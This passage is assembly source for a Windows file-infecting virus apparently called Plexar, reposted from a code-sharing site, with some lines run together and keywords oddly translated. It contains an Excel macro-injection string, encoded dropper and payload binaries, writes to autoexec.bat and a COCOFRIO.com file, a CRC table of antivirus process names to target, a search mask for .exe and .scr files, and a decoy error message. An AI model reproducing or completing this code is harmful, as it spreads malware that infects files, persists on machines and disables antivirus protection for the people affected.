DB 'Excel.Application.ActiveWorkbook.vbProject.vbComponents.Import "C: / Raxelp. $$$", 0DH, 0AH

DB 'Excel.activeWindow.visible = not -1', 0DH, 0AH

DB 'Excel.Workbooks ("Personal.xls"). Save', 0DH, 0AHDB 'End If', 0DH, 0AH

DB 'Excel.Application.quit', 0DH, 0AH

DB 'end, 0DH, 0AH

LARGO_MVBS EQU $ -Macro_VBS

FHANDE_DPE DD 00000000H

MHANDLE_DPE DD 00000000H

Basemap_dpe dd 00000000h

Dropper Label Near

DB 04DH, 038H, 05AH, 050H, 038H, 002H, 067H, 002H

DB 004H, 007H, 00FH, 007H, 0FFH, 01CH, 010H, 0B8H

DB 0E1H, 048H, 001H, 040H, 0E0H, 01AH, 0e1H, 00ah

DB 0B3H, 001H, 01CH, 006H, 0BAH, 010H, 000H, 00Eh

DB 01FH, 0B4H, 009H, 0CDH, 021H, 07DH, 0B8H, 067H

DB 04CH, 00AH, 090H, 010H, 054H, 068H, 069H, 073H

DB 007H, 020H, 070H, 072H, 06FH, 067H, 033H, 061H

DB 06DH, 0C7H, 027H, 075H, 0C7H, 074H, 0D3H, 062H

DB 065H, 0C7H, 0FFH, 00FH, 06EH, 099H, 006H, 064H

DB 0E7H, 0C7H, 0D3H, 057H, 069H, 0D0H, 033H, 032H

DB 00DH, 01CH, 00AH, 024H, 037H, 029H, 001H, 057H

DB 063H, 050H, 045H, 001H, 005H, 04CH, 001H, 005H

DB 001H, 099H, 02BH, 05CH, 0A3H, 058H, 014H, 0E0H

DB 0E0H, 08EH, 004H, 081H, 00BH, 001H, 002H, 019H

DB 08DH, 019H, 022H, 007H, 08AH, 010H, 004H, 064H

DB 020H, 099H, 01EH, 056H, 00CH, 041H, 053H, 001H

DB 01FH, 038H, 003H, 029H, 00ah, 009H, 012H, 070H

DB 036H, 04DH, 002H, 0A4H, 01FH, 0A4H, 035H, 053H

DB 020H, 008H, 07BH, 0A5H, 04BH, 02BH, 001H, 0B2H

DB 097H, 0A2H, 02EH, 00ah, 060H, 038H, 052H, 0BCH

DB 0A1H, 0D4H, 061H, 0F8H, 0EBH, 0C1H, 043H, 04FH

DB 044H, 045H, 05BH, 0D8H, 022H, 002H, 056H, 006H

DB 024H, 095H, 0B7H, 007H, 0E0H, 044H, 041H, 054H

DB 02AH, 00DH, 0CAH, 004H, 091H, 012H, 035H, 008H

DB 050H, 07CH, 0C3H, 0C0H, 007H, 02EH, 069H, 064H

DB 061H, 074H, 02AH, 04CH, 06DH, 023H, 026H, 03CH

DB 0D4H, 028H, 0E0H, 072H, 065H, 06CH, 023H, 06FH

DB 063H, 091H, 050H, 0C8H, 01CH, 056H, 040H, 050H

DB 073H, 0E4H, 063H, 0E1H, 01DH, 022H, 01CH, 08AHDB 01EH, 028H, 054H, 0E1H, 05AH, 001H, 0FFH, 0B0H

DB 033H, 0C0H, 050H, 084H, 030H, 0E8H, 01DH, 019H

DB 068H, 088H, 013H, 0DEH, 00AH, 099H, 007H, 015H

DB 06AH, 091H, 00Eh, 006H, 007H, 0FFH, 025H, 050H

DB 040H, 01CH, 00DH, 054H, 086H, 045H, 05CH, 04BH

DB 001H, 0FEH, 0BFH, 0C9H, 03CH, 0F1H, 0D4H, 0C6H

DB 064H, 019H, 065H, 050H, 009H, 048H, 02CH, 014H

DB 071H, 089H, 05CH, 03EH, 03EH, 0F8H, 033H, 07CH

DB 031H, 084H, 0A4H, 063H, 092H, 0E5H, 06AH, 014H

DB 007H, 04BH, 045H, 052H, 04EH, 030H, 04CH, 033H

DB 032H, 02EH, 038H, 064H, 06CH, 0F0H, 035H, 055H

DB 053H, 01CH, 036H, 00BH, 002H, 0F9H, 0D9H, 065H

DB 0C6H, 0F4H, 031H, 080H, 045H, 078H, 069H, 074H

DB 050H, 072H, 03FH, 06FH, 063H, 038H, 073H, 0EFH

DB 01DH, 058H, 02AH, 06BH, 04DH, 0C7H, 017H, 061H

DB 067H, 094H, 041H, 0CFH, 001H, 0AAH, 0D7H, 0B6H

DB 097H, 00Eh, 01FH, 030H, 025H, 04EH, 02BH, 097H

DB 07FH, 004H, 0BEH, 004H, 0B2H, 02FH, 07AH, 03BH

DB 063H, 002H, 083H, 003H, 05FH, 00DH, 081H, 0E7H

DB 080H, 00EH, 091H, 011H, 038H, 056H, 020H, 08BH

DB 001H, 0F9H, 0F0H, 015H, 050H, 018H, 0B5H, 008H

DB 014H, 0A0H, 094H, 068H, 030H, 0ACH, 00AH, 0BFH

DB 08AH, 02CH, 015H, 029H, 018H, 071H, 090H, 011H

DB 0B4H, 060H, 001H, 0E8H, 002H, 04EH, 08CH, 02FH

DB 09CH, 0C1H, 0F5H, 014H, 04FH, 09CH, 038H, 009H

DB 038H, 049H, 032H, 044H, 009H, 05FH, 027H, 043H

DB 007H, 04FH, 007H, 04EH, 007H, 031H, 005H, 028H

DB 067H, 0A4H, 005H, 040H, 04AH, 04AH, 004H, 028H

DB 08AH, 080H, 002H, 0DEH, 0D4H, 056H, 080H, 081H

DB 077H, 0F1H, 049H, 007H, 046H, 002H, 013H, 06DH

DB 0C0H, 002H, 010H, 047H, 009H, 005H, 0FFH, 05CH

DB 003H, 03BH, 0F8H, 0A4H, 007H, 0A2H, 002H, 08CH

DB 013H, 00BH, 0AH, 0C3H, 003H, 007H, 077H, 087H

DB 097H, 036H, 078H, 009H, 063H, 00ah, 018H, 0A2HDB 022H, 03FH, 002H, 020H, 046H, 03CH, 070H, 0FDH

DB 033H, 00ah, 0A2H, 04BH, 0F0H, 086H, 016H, 0A1H

DB 010H, 08FH, 0E5H, 00FH, 0C2H, 013H, 00DH, 022H

DB 007H, 088H, 008H, 05FH, 0AAH, 09BH, 010H, 06FH

DB 00FH, 010H, 0ADH, 007H, 041H, 0C3H, 01BH, 03EH

DB 020H, 0A2H, 01DH, 072H, 04EH, 0A4H, 040H, 0E1H

DB 046H, 020H, 07CH, 0DCH, 004H, 029H, 010H, 06EH

DB 039H, 04FH, 008H, 09CH, 0DEH, 088H, 06BH, 010H

DB 033H, 03FH, 008H, 0F5H, 00ah, 001H, 077H, 010H

DB 0EDH, 01BH, 094H, 00BH, 087H, 020H, 0B1H, 080H

DB 011H, 0C5H, 010H, 0A9H, 00ah, 020H, 01BH, 001H

DB 016H, 087H, 04CH, 021H, 008H, 08EH, 03EH, 019H

DB 099H, 0FFH, 0E7H, 0D3H, 02AH, 00BH, 010H, 010H

DB 06FH, 009H, 016H, 02CH, 019H, 021H, 091H, 08CH

DB 06EH, 0F0H, 014H, 08FH, 080H, 0F4H, 001H, 019H

DB 011H, 018H, 092H, 0A2H, 09DH, 03FH, 09FH, 01DH

DB 070H, 0A8H, 010H, 06EH, 090H, 0CAH, 054H, 010H

DB 07FH, 089H, 0F9H, 008H, 080H, 0A3H, 0D6H, 07AH

DB 020H, 086H, 0EFH, 00DH, 045H, 093H, 022H, 010H

DB 0F0H, 00DH, 043H, 0A8H, 09CH, 010H, 0DBH, 062H

DB 021H, 0C5H, 019H, 021H, 09CH, 087H, 056H, 010H

DB 0A0H, 071H, 007H, 069H, 07FH, 042H, 009H, 0EBH

DB 02AH, 014H, 0F0H, 04FH, 05FH, 028H, 0CAH, 0F5H

DB 020H, 005H, 090H, 014H, 008H, 099H, 097H, 0D3H

DB 094H, 0F0H, 07AH, 071H, 070H, 092H, 02CH, 0DFH

DB 0D2H, 0F2H, 004H, 0A0H, 04CH, 0B1H, 0CAH, 031H

DB 070H, 02FH, 00AH, 099H, 0A2H, 010H, 047H, 007H

DB 0EAH, 005H, 033H, 020H, 009H, 054H, 081H, 011H

DB 078H, 045H, 080H, 020H, 022H, 099H, 0D5H, 0C1H

DB 010H, 048H, 002H, 050H, 020H, 009H, 06AH, 090H

DB 020H, 021H, 06AH, 030H, 031H, 006H, 00ah, 0A0H

DB 059H, 00CH, 023H, 04EH, 070H, 029H, 02AH, 0A2H

DB 01EH, 0B7H, 0B4H, 028H, 069H, 00ah, 0D0H, 01FH

DB 047H, 079H, 004H, 097H, 05AH, 060H, 04AH, 0EFHDB 084H, 033H, 088H, 095H, 08FH, 01FH, 062H, 0ECH

DB 09AH, 055H, 072H, 0C4H, 070H, 071H, 020H, 04CH

DB 010H, 0E6H, 0C9H, 0E8H, 05EH, 06EH, 072H, 0BDH

DB 001H, 075H, 0D6H, 0C0H, 000H

Guarda_eip DD 00000000H

Fhandle DD 0000000000h

MHANDLE DD 00000000H

Basemap DD 00000000H

Tama_1 DD 00000000H

Tama_2 DD 00000000H

CRC_PLXR EQU 09EB7DF5H

CRCNOINF DD 056B06AB2H

DD 0C4B3B3AEH

DD 09FAACC5EH

DD 003E9FED8H

DD 071C0B944H

DD 0AEBB798CH

DD 098BEBD89H

DD 0DA2CC2EBH

DD 0527EDB25H

DD 0ee9E3F8BH

DD 0624D4378H

DD 00926128CH

DD 0A6B26D55H

DD 0617F1F35H

DD 05AE2F365H

DD 085B3A1E3H

DD 05CE63D60H

DD 09EA8CB96H

DD 0A0AC0C6DH

; - la foquida Tabla - Copyright (C) 2001 Mongolito Enterprises

"DEFR" 56B06AB2

"SCAN" C4B3B3AE

"Anti" 9FAACC5E

"Rund" 03E9FED8

"WSCR" 71c0b944

"CSCR" AEBB798C

"DRWA" 98bebd89

"SMAR" DA2CC2EB

"Task" 527edb25

"AVPM" EE9E3F8B

"AVP3" 624D4378

"AVPC" 0926128C

"Avwi" A6B26D55

"AVCO" 617f1f35

"VSHW" 5AE2F365

"FP-W" 85B3A1E3

"F-ST" 5CE63D60

"F-PR" 9EA8CB96

"F-AG" A0AC0C6D

; - la foquida Tabla - Copyright (C) 2001 Mongolito Enterprises

IF Debug

Mascara db "bait *. ???", 00h

Else

Mascara db "*. ???", 00h

ENDIF

Busqueda DB sizeof_win32_find_data dup (00h)

Rewtdir DB Max_Path DUP (00h)

BHANDLE DD 00000000H

IF Debug

Puto_puto db ".", 00h

Else

Puto_puto db "..", 00h

ENDIF

LARGPP DD 00000000H

CRC_EXE EQU 0F643C743H

CRC_SCR EQU 096C10707H

Tempapi DB 25D DUP (00h)

ResAVe DD 00000000H

Packedapis DB "X", 00HDB "CREATE", 00h

DB "file", 00h

DB "Map", 00h

DB "View", 00h

DB "close", 00h

DB "get", 00h

DB "set", 00h

DB "find", 00h

DB "Virtual", 00h

DB "window", 00h

DB "Directory", 00h

DB "Current", 00h

DB "Waitfor", 00h

DB "thread", 00h

DB 0FFH

Pfhandle DD 00000000H

PTEMPORAL DD 00000000H

COCOFRIO DB "C: /COCOFRIO.com", 00h

Largo_cocofrio Equ $ -cocofrio

Autoexec db "c: /autoexec.bat", 00h

PayLoad_Prog Label Near

DB 081H, 0FCH, 0C5H, 005H, 077H, 002H, 0CDH, 020H

DB 0B9H, 037H, 002H, 0BEH, 037H, 003H, 0BFH, 065H

DB 005H, 0BBH, 000H, 080H, 0FDH, 0F3H, 0A4H, 0FCH

DB 087H, 0F7H, 083H, 0EEH, 0C6H, 019H, 0EDH, 057H

DB 057H, 0E9H, 0EDH, 003H, 055H, 050H, 058H, 021H

DB 00BH, 001H, 004H, 008H, 0A7H, 0CBH, 0C1H, 082H

DB 0C6H, 0B5H, 090H, 039H, 000H, 004H, 0A8H, 001H

DB 006H, 0DDH, 0FFH, 0FFH, 0B4H, 02AH, 0CDH, 021H

DB 088H, 016H, 080H, 003H, 080H, 0FEH, 007H, 076H

DB 019H, 033H, 0C0H, 08AH, 0FEH, 0FFH, 0C6H, 0F6H

DB 0E6H, 033H, 0D2H, 0B3H, 005H, 0F6H, 0F3H, 002H

DB 0C2H, 02CH, 004H, 03AH, 006H, 092H, 0DFH, 018H

DB 074H, 019H, 0EBH, 06BH, 090H, 091H, 067H, 003H

DB 004H, 0EFH, 0FFH, 075H, 054H, 0B8H, 012H, 000H

DB 0CDH, 010H, 0B4H, 00Bh, 0BBH, 00Eh, 006H, 0BFH

DB 0FDH, 002H, 033H, 0DBH, 0BAH, 000H, 009H, 008H

DB 0B3H, 039H, 0BEH, 095H, 001H, 0C7H, 0FEH, 0E8H

DB 003H, 070H, 0B3H, 028H, 0BEH, 0CAH, 007H, 024H

DB 0BEH, 0DFH, 0CCH, 016H, 003H, 042H, 0CDH, 016H

DB 0BEH, 054H, 09BH, 0FBH, 003H, 0B3H, 01EH, 0B8H

DB 003H, 02EH, 061H, 0B4H, 0FFH, 0FFH, 00EH, 0ACH

DB 00AH, 0C0H, 074H, 010H, 0B9H, 038H, 000H, 051H

DB 0B9H, 0FFH, 0FFH, 0E2H, 0FEH, 059H, 0F6H, 0DBHDB 0E2H, 0F7H, 016H, 0EBH, 0EBH, 0B8H, 000H, 04CH

DB 090H, 013H, 0D9H, 020H, 000H, 0C4H, 0FEH, 037H

DB 03CH, 020H, 050H, 04CH, 045H, 058H, 041H, 052H

DB 020H, 03EH, 0B6H, 0FDH, 00DH, 00DH, 00ah, 001h

DB 000H, 028H, 06FH, 057H, 02EH, 000H, 06DH, 061H

DB 073H, 0DFH, 0FEH, 020H, 065H, 06EH, 074H, 072H

DB 065H, 074H, 005H, 069H, 064H, 06FH, 020H, 06EH

DB 0FFH, 071H, 075H, 065H, 020H, 075H, 06EH, 020H

DB 070H, 016H, 065H, 06FH, 07EH, 0EBH, 018H, 020H

DB 019H, 061H, 063H, 074H, 06FH, 072H, 0B2H, 0E6H

DB 029H, 041H, 038H, 0D8H, 096H, 01BH, 070H, 033H

DB 0DFH, 01EH, 06CH, 061H, 004H, 061H, 064H, 065H

DB 063H, 0DFH, 0CAH, 06FH, 020H, 03BH, 06DH, 062H

DB 065H, 06CH, 0B9H, 0B7H, 06CH, 00CH, 069H, 06DH

DB 069H, 05FH, 0B6H, 0BDH, 012H, 075H, 072H, 062H

DB 01EH, 06FH, 047H, 023H, 06CH, 088H, 0ACH, 0B5H

DB 06CH, 02CH, 050H, 04FH, 06DH, 0DBH, 04BH, 020H

DB 047H, 06EH, 05DH, 0B7H, 03DH, 065H, 003H, 061H

DB 04FH, 06CH, 008H, 0FBH, 020H, 067H, 06FH, 063H

DB 068H, 03FH, 06DH, 0D8H, 040H, 061H, 093H, 06DH

DB 041H, 061H, 091H, 061H, 0F7H, 076H, 0C6H, 069H

DB 06CH, 03DH, 04BH, 0B1H, 076H, 074H, 075H, 066H

DB 020H, 03EH, 00Eh, 061H, 080H, 079H, 020H, 0BDH

DB 0FDH, 041H, 062H, 06FH, 084H, 076H, 061H, 072H

DB 06EH, 0B6H, 073H, 06EH, 045H, 078H, 07FH, 0DBH

DB 073H, 06FH, 0C9H, 072H, 00FH, 06DH, 065H, 073H

DB 0B2H, 0B3H, 06DH, 081H, 000H, 043H, 0FFH, 0B7H

DB 04DH, 028H, 063H, 029H, 020H, 032H, 030H, 030H

DB 02FH, 0FFH, 031H, 020H, 04CH, 069H, 074H, 065H

DB 053H, 079H, 02FH, 02FH, 020H, 01EH, 0DCH, 048H

DB 065H, 0B6H, 049H, 056H, 0ADH, 0DDH, 003H, 065H

DB 07AH, 051H, 08FH, 0BBH, 0EDH, 02EH, 000H, 048H

DB 068H, 074H, 09CH, 072H, 06FH, 015H, 00, 018H

DB 01FH, 0DAH, 0CDH, 09DH, 07AH, 06EH, 064H, 002HDB 005H, 0D7H, 034H, 05DH, 0EEH, 0C3H, 009H, 0F9H

DB 004H, 0EDH, 00AH, 07BH, 0F7H, 059H, 0C3H, 000H

DB 000H, 040H, 0A8H, 000H, 000H, 000H, 000H, 020H

DB 001H, 0FFH, 0A4H, 0E8H, 034H, 000H, 072H, 0FAH

DB 041H, 0E8H, 029H, 000H, 0E3H, 035H, 073H, 0F9H

DB 083H, 0E9H, 003H, 072H, 006H, 088H, 0CCH, 0ACH

DB 0F7H, 0D0H, 095H, 031H, 0C9H, 0E8H, 015H, 000H

DB 011H, 0C9H, 075H, 008H, 041H, 0E8H, 00DH, 000H

DB 073H, 0FBH, 041H, 041H, 041H, 08DH, 003H, 096H

DB 0F3H, 0A4H, 096H, 0EBH, 0CEH, 0E8H, 002H, 000H

DB 011H, 0C9H, 001H, 0DBH, 075H, 004H, 0ADH, 011H

DB 0C0H, 093H, 0C3H, 05EH, 0B9H, 003H, 000H, 0ACH

DB 02CH, 0E8H, 03CH, 001H, 077H, 0F9H, 0C1H, 004H

DB 008H, 029H, 034H, 0ADH, 0E2H, 0F1H, 0C3H

Largo_pprog Equ $ -PAYLOAD_PROG

Where is Xiyomira? Where is Xomotice? Where is Xomo?

DB 10h DUP (90H)

Termina_Plexar Label Near

Mentira Proc

Push 0ah; lang_spanish

PUSH 040000H 080000H 010H; MB_TOPMOST & MB_RIGHT & MB_ICONERROR

Push Offset Titulo

Push Offset Mensaje

PUSH 0

Call MessageBoxexa

PUSH 0

Call EXITPROCESS

Mentira ENDP

End Empieza_PLEXAR

转载请注明原文地址:https://www.9cbs.com/read-37082.html

9cbs

New Post(0)